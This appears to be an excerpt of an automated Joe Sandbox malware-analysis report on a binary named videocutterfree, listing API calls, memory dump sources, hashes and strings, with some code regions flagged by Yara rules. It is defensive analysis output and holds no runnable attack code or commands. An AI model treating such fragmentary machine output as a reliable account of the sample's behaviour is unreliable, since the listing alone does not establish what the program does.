• LCMapStringW.KERNEL32(00000000,00000100,004065FC,00000001,00000000,00000000,00000103,00000001,00000000,?,00405395,00200020,00000000,?,00000000,00000000), ref: 00405B07
• LCMapStringA.KERNEL32(00000000,00000100,004065F8,00000001,00000000,00000000,?,00405395,00200020,00000000,?,00000000,00000000,00000001), ref: 00405B23
• LCMapStringA.KERNEL32(00000000,?,00000000,00200020,00405395,?,00000103,00000001,00000000,?,00405395,00200020,00000000,?,00000000,00000000), ref: 00405B6C
• MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00405395,00200020,00000000,?,00000000,00000000), ref: 00405BA4
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00405395,00200020,00000000,?,00000000), ref: 00405BFC
• LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00405395,00200020,00000000,?,00000000), ref: 00405C12
• LCMapStringW.KERNEL32(00000000,?,00405395,00000000,00405395,?,?,00405395,00200020,00000000,?,00000000), ref: 00405C45
• LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00405395,00200020,00000000,?,00000000), ref: 00405CAD
Memory Dump Source
• Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
Similarity
• API ID: String$ByteCharMultiWide
• String ID:
• API String ID: 352835431-0
APIs
• sqlite3_value_text.SQLITE3 ref: 6095F030
• sqlite3_value_text.SQLITE3 ref: 6095F03E
• sqlite3_stricmp.SQLITE3 ref: 6095F0B3
• sqlite3_free.SQLITE3 ref: 6095F180
  • Part of subcall function 6092E279: strcmp.MSVCRT ref: 6092E2AE
  • Part of subcall function 6092E279: sqlite3_free.SQLITE3 ref: 6092E3A8
• sqlite3_free.SQLITE3 ref: 6095F1BD
  • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
• sqlite3_result_error_code.SQLITE3 ref: 6095F34E
Strings
Memory Dump Source
• Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
Similarity
• API ID: sqlite3_free$sqlite3_value_text$sqlite3_mutex_entersqlite3_result_error_codesqlite3_stricmpstrcmp
• String ID: |
• API String ID: 1576672187-2343686810
                                                                              • Opcode ID: 45796efa6547682f16092b9fa288c01422e20de86ab54653b6df12e990b05c38
                                                                              • Instruction ID: c4017fd8acd983bc841f22cdb0f4132ffe50c361176833da1127552c957ad2bb
                                                                              • Opcode Fuzzy Hash: 45796efa6547682f16092b9fa288c01422e20de86ab54653b6df12e990b05c38
                                                                              • Instruction Fuzzy Hash: B2B189B4A08308CBDB01CF69C491B9EBBF2BF68358F148968E854AB355D734EC55CB81
                                                                              APIs
                                                                              • sqlite3_snprintf.SQLITE3 ref: 6095D450
                                                                                • Part of subcall function 60917354: sqlite3_vsnprintf.SQLITE3 ref: 60917375
                                                                              • sqlite3_snprintf.SQLITE3 ref: 6095D4A1
                                                                              • sqlite3_snprintf.SQLITE3 ref: 6095D525
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_snprintf$sqlite3_vsnprintf
                                                                              • String ID: $)><$sqlite_master$sqlite_temp_master
                                                                              • API String ID: 652164897-1572359634
                                                                              • Opcode ID: 7664a015b2dc01db37cf12657f922778db359f6c70a1ba93bfebbfbe3581116b
                                                                              • Instruction ID: a98725bc65f6cff0ffebef66634980575a39ba2d787d432de3c608a01e11e389
                                                                              • Opcode Fuzzy Hash: 7664a015b2dc01db37cf12657f922778db359f6c70a1ba93bfebbfbe3581116b
                                                                              • Instruction Fuzzy Hash: 5991F275E05219CFCB15CF98C48169DBBF2BFA9308F14845AE859AB314DB34ED46CB81
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00403EB6
                                                                              • GetStdHandle.KERNEL32(000000F4,00406530,00000000,?,00000000,00000000), ref: 00403F8C
                                                                              • WriteFile.KERNEL32(00000000), ref: 00403F93
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: File$HandleModuleNameWrite
                                                                              • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                              • API String ID: 3784150691-4022980321
                                                                              • Opcode ID: bbd6413f63fe96b7e5b48312adb5ae61c8d63f3eaa3365522491f5c9dac2931a
                                                                              • Instruction ID: 3c6e91fafd8a39623fea44a7e4d0bb864fdf88bac524e29ab6bf21fbc7efbe24
                                                                              • Opcode Fuzzy Hash: bbd6413f63fe96b7e5b48312adb5ae61c8d63f3eaa3365522491f5c9dac2931a
                                                                              • Instruction Fuzzy Hash: 6D31D472A40218AEDF20EB60CD49F9B776DEB41305F1004BBF545F61C0E6B8EB948A9D
                                                                              APIs
                                                                              • sqlite3_value_text.SQLITE3 ref: 6091B06E
                                                                              • sqlite3_result_error_toobig.SQLITE3 ref: 6091B178
                                                                              • sqlite3_result_error_nomem.SQLITE3 ref: 6091B197
                                                                              • sqlite3_result_text.SQLITE3 ref: 6091B5A3
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_result_error_nomemsqlite3_result_error_toobigsqlite3_result_textsqlite3_value_text
                                                                              • String ID:
                                                                              • API String ID: 2352520524-0
                                                                              • Opcode ID: bf61c68f4ce88464188c3b4ec21cbec410585f797eaf5b0aff599f1fc01aebfc
                                                                              • Instruction ID: 99f21b63ad5c9672efebb0dd762c853f70c7e366ddc85f9db9da2d733c13ec0c
                                                                              • Opcode Fuzzy Hash: bf61c68f4ce88464188c3b4ec21cbec410585f797eaf5b0aff599f1fc01aebfc
                                                                              • Instruction Fuzzy Hash: F9E16B71E4C2199BDB208F18C89039EBBF7AB65314F1584DAE8A857351D738DCC19F82
                                                                              APIs
                                                                                • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                                                • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                                                • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                                              • sqlite3_exec.SQLITE3 ref: 6096A4D7
                                                                                • Part of subcall function 6094CBB8: sqlite3_log.SQLITE3 ref: 6094CBF8
                                                                              • sqlite3_result_text.SQLITE3 ref: 6096A5D3
                                                                                • Part of subcall function 6096A38C: sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                                • Part of subcall function 6096A38C: sqlite3_step.SQLITE3 ref: 6096A435
                                                                                • Part of subcall function 6096A38C: sqlite3_reset.SQLITE3 ref: 6096A445
                                                                              • sqlite3_exec.SQLITE3 ref: 6096A523
                                                                              • sqlite3_exec.SQLITE3 ref: 6096A554
                                                                              • sqlite3_exec.SQLITE3 ref: 6096A57F
                                                                              • sqlite3_result_error_code.SQLITE3 ref: 6096A5E1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_exec$sqlite3_bind_intsqlite3_freesqlite3_logsqlite3_mprintfsqlite3_resetsqlite3_result_error_codesqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                                              • String ID: optimize
                                                                              • API String ID: 3659050757-3797040228
                                                                              • Opcode ID: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
                                                                              • Instruction ID: 653702cfcd2f061f0588c77de086fc27204f9fc351fc8b4992cba684a546c14d
                                                                              • Opcode Fuzzy Hash: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
                                                                              • Instruction Fuzzy Hash: E831C3B11187119FE310DF24C49570FBBE6ABA1368F10C91DF9968B350E7B9D8459F82
                                                                              APIs
                                                                              • sqlite3_malloc.SQLITE3 ref: 609645D9
                                                                                • Part of subcall function 60928099: sqlite3_malloc.SQLITE3 ref: 609280ED
                                                                              • sqlite3_free.SQLITE3 ref: 609647C5
                                                                                • Part of subcall function 60963D35: memcmp.MSVCRT ref: 60963E74
                                                                              • sqlite3_free.SQLITE3 ref: 6096476B
                                                                                • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                              • sqlite3_free.SQLITE3 ref: 6096477B
                                                                              • sqlite3_free.SQLITE3 ref: 60964783
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_free$sqlite3_malloc$memcmpsqlite3_mutex_enter
                                                                              • String ID:
                                                                              • API String ID: 571598680-0
                                                                              • Opcode ID: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
                                                                              • Instruction ID: 53ad94a03898eae12f4127695087571842428d6fdffc19c65fee49adcf86f1ae
                                                                              • Opcode Fuzzy Hash: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
                                                                              • Instruction Fuzzy Hash: 5E91F674E14228CFEB14CFA9D890B9EBBB6BB99304F1085AAD849A7344D734DD81CF51
                                                                              APIs
                                                                              • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FD4), ref: 004037A9
                                                                              • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FD4), ref: 004037BD
                                                                              • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FD4), ref: 004037E9
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FD4), ref: 00403821
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FD4), ref: 00403843
                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402FD4), ref: 0040385C
                                                                              • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FD4), ref: 0040386F
                                                                              • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004038AD
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                              • String ID:
                                                                              • API String ID: 1823725401-0
                                                                              • Opcode ID: ab2790d97251511a40c3572448f08c6a970ad3f5a554216861b1f685f7881b14
                                                                              • Instruction ID: 6d0065f3ce240da63f4aa51e87ad3c69eba18c37eea41e84d35f232e94358c46
                                                                              • Opcode Fuzzy Hash: ab2790d97251511a40c3572448f08c6a970ad3f5a554216861b1f685f7881b14
                                                                              • Instruction Fuzzy Hash: 3C3126B35042251EE7213F755C8483B7EDCEA8535A71149BFF552F3281E6398E8142AD
                                                                              APIs
                                                                              • OpenEventA.KERNEL32(00100002,00000000,00000000,F3247817), ref: 009A0460
                                                                              • CloseHandle.KERNEL32(00000000), ref: 009A0475
                                                                              • ResetEvent.KERNEL32(00000000,F3247817), ref: 009A047F
                                                                              • CloseHandle.KERNEL32(00000000,F3247817), ref: 009A04B4
                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,F3247817), ref: 009A052A
                                                                              • CloseHandle.KERNEL32(00000000), ref: 009A053F
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseEventHandle$CreateOpenReset
                                                                              • String ID:
                                                                              • API String ID: 1285874450-0
                                                                              • Opcode ID: 9aee9ff80157aa7045c67d2068e11fa812cfa6c11ad9b75c6a6cf40a2b0d958c
                                                                              • Instruction ID: f570ecadaf5b3b08e1bcfbe3d8549f6983c8cd71dd599d9eca1538d3926a8948
                                                                              • Opcode Fuzzy Hash: 9aee9ff80157aa7045c67d2068e11fa812cfa6c11ad9b75c6a6cf40a2b0d958c
                                                                              • Instruction Fuzzy Hash: BB415070D043489FDF10CFA5C845B9EBBF8BF8A724F104219E918AB291E7359905CB90
                                                                              APIs
                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 009920AC
                                                                              • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 009920CD
                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009920D8
                                                                              • InterlockedDecrement.KERNEL32(?), ref: 0099213E
                                                                              • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 0099217A
                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00992187
                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009921A6
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
                                                                              • String ID:
                                                                              • API String ID: 1171374749-0
                                                                              • Opcode ID: 5d63350120b5955de8b6f836052a2ee137d7b1bba47453827b5c679f55f9d198
                                                                              • Instruction ID: fc8b5ba1c7103d8a46fe001c6f713c6ddc416a21cc0373660b911a728a4072c4
                                                                              • Opcode Fuzzy Hash: 5d63350120b5955de8b6f836052a2ee137d7b1bba47453827b5c679f55f9d198
                                                                              • Instruction Fuzzy Hash: F1412875508701AFC721DF2AD885A6BBBE9FFD8760F000A1EF49682250D734E909DB92
                                                                              APIs
                                                                                • Part of subcall function 009A0C80: OpenEventA.KERNEL32(00100002,00000000,?,?,?,009A04DE,?,?), ref: 009A0CAF
                                                                                • Part of subcall function 009A0C80: CloseHandle.KERNEL32(00000000,?,?,009A04DE,?,?), ref: 009A0CC4
                                                                                • Part of subcall function 009A0C80: SetEvent.KERNEL32(00000000,009A04DE,?,?), ref: 009A0CD7
                                                                              • OpenEventA.KERNEL32(00100002,00000000,00000000,F3247817), ref: 009A0460
                                                                              • CloseHandle.KERNEL32(00000000), ref: 009A0475
                                                                              • ResetEvent.KERNEL32(00000000,F3247817), ref: 009A047F
                                                                              • CloseHandle.KERNEL32(00000000,F3247817), ref: 009A04B4
                                                                              • __CxxThrowException@8.LIBCMT ref: 009A04E5
                                                                                • Part of subcall function 009A330A: RaiseException.KERNEL32(?,?,0099E90E,?,?,?,?,?,?,?,0099E90E,?,009BFCF8,?), ref: 009A335F
                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,F3247817), ref: 009A052A
                                                                              • CloseHandle.KERNEL32(00000000), ref: 009A053F
                                                                                • Part of subcall function 009A09C0: GetCurrentProcessId.KERNEL32(?), ref: 009A0A19
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,F3247817), ref: 009A054F
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
                                                                              • String ID:
                                                                              • API String ID: 2227236058-0
                                                                              APIs
                                                                              • sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                                • Part of subcall function 60962F28: sqlite3_log.SQLITE3 ref: 60962F5D
                                                                              • sqlite3_mprintf.SQLITE3 ref: 60963534
                                                                              • sqlite3_blob_open.SQLITE3 ref: 6096358B
                                                                              • sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                              • sqlite3_malloc.SQLITE3 ref: 609635BB
                                                                              • sqlite3_blob_read.SQLITE3 ref: 60963602
                                                                              • sqlite3_free.SQLITE3 ref: 60963621
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_blob_bytessqlite3_blob_opensqlite3_blob_readsqlite3_blob_reopensqlite3_freesqlite3_logsqlite3_mallocsqlite3_mprintf
                                                                              • String ID:
                                                                              • API String ID: 4276469440-0
                                                                              APIs
                                                                              • sqlite3_value_text.SQLITE3 ref: 6091A240
                                                                              • sqlite3_value_text.SQLITE3 ref: 6091A24E
                                                                              • sqlite3_value_bytes.SQLITE3 ref: 6091A25A
                                                                              • sqlite3_value_text.SQLITE3 ref: 6091A27C
                                                                              Strings
                                                                              • LIKE or GLOB pattern too complex, xrefs: 6091A267
                                                                              • ESCAPE expression must be a single character, xrefs: 6091A293
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_value_text$sqlite3_value_bytes
                                                                              • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                              • API String ID: 4080917175-264706735
                                                                              APIs
                                                                                • Part of subcall function 6092506E: sqlite3_log.SQLITE3 ref: 609250AB
                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 609250E7
                                                                              • sqlite3_value_text16.SQLITE3 ref: 60925100
                                                                              • sqlite3_value_text16.SQLITE3 ref: 6092512C
                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 6092513E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_value_text16$sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                              • String ID: library routine called out of sequence$out of memory
                                                                              • API String ID: 2019783549-3029887290
                                                                              APIs
                                                                              • __init_pointers.LIBCMT ref: 009A4B44
                                                                                • Part of subcall function 009A72B2: RtlEncodePointer.NTDLL(00000000), ref: 009A72B5
                                                                                • Part of subcall function 009A72B2: __initp_misc_winsig.LIBCMT ref: 009A72D0
                                                                                • Part of subcall function 009A72B2: GetModuleHandleW.KERNEL32(kernel32.dll,?,009C02F8,00000008,00000003,009BFCDC,?,00000001), ref: 009A8031
                                                                                • Part of subcall function 009A72B2: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 009A8045
                                                                                • Part of subcall function 009A72B2: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 009A8058
                                                                                • Part of subcall function 009A72B2: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 009A806B
                                                                                • Part of subcall function 009A72B2: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 009A807E
                                                                                • Part of subcall function 009A72B2: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 009A8091
                                                                                • Part of subcall function 009A72B2: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 009A80A4
                                                                                • Part of subcall function 009A72B2: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 009A80B7
                                                                                • Part of subcall function 009A72B2: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 009A80CA
                                                                                • Part of subcall function 009A72B2: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 009A80DD
                                                                                • Part of subcall function 009A72B2: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 009A80F0
                                                                                • Part of subcall function 009A72B2: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 009A8103
                                                                                • Part of subcall function 009A72B2: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 009A8116
                                                                                • Part of subcall function 009A72B2: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 009A8129
                                                                                • Part of subcall function 009A72B2: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 009A813C
                                                                                • Part of subcall function 009A72B2: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 009A814F
                                                                              • __mtinitlocks.LIBCMT ref: 009A4B49
                                                                              • __mtterm.LIBCMT ref: 009A4B52
                                                                                • Part of subcall function 009A4BBA: RtlDeleteCriticalSection.NTDLL(00000000), ref: 009A76E8
                                                                                • Part of subcall function 009A4BBA: _free.LIBCMT ref: 009A76EF
                                                                                • Part of subcall function 009A4BBA: RtlDeleteCriticalSection.NTDLL(009C2978), ref: 009A7711
                                                                              • __calloc_crt.LIBCMT ref: 009A4B77
                                                                              • __initptd.LIBCMT ref: 009A4B99
                                                                              • GetCurrentThreadId.KERNEL32 ref: 009A4BA0
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                              • String ID:
                                                                              • API String ID: 3567560977-0
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,009A2223,00000000), ref: 009A228B
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 009A2292
                                                                              • RtlEncodePointer.NTDLL(00000000), ref: 009A229E
                                                                              • RtlDecodePointer.NTDLL(00000001), ref: 009A22BB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                              • String ID: RoInitialize$combase.dll
                                                                              • API String ID: 3489934621-340411864
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,009A2260), ref: 009A2360
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 009A2367
                                                                              • RtlEncodePointer.NTDLL(00000000), ref: 009A2372
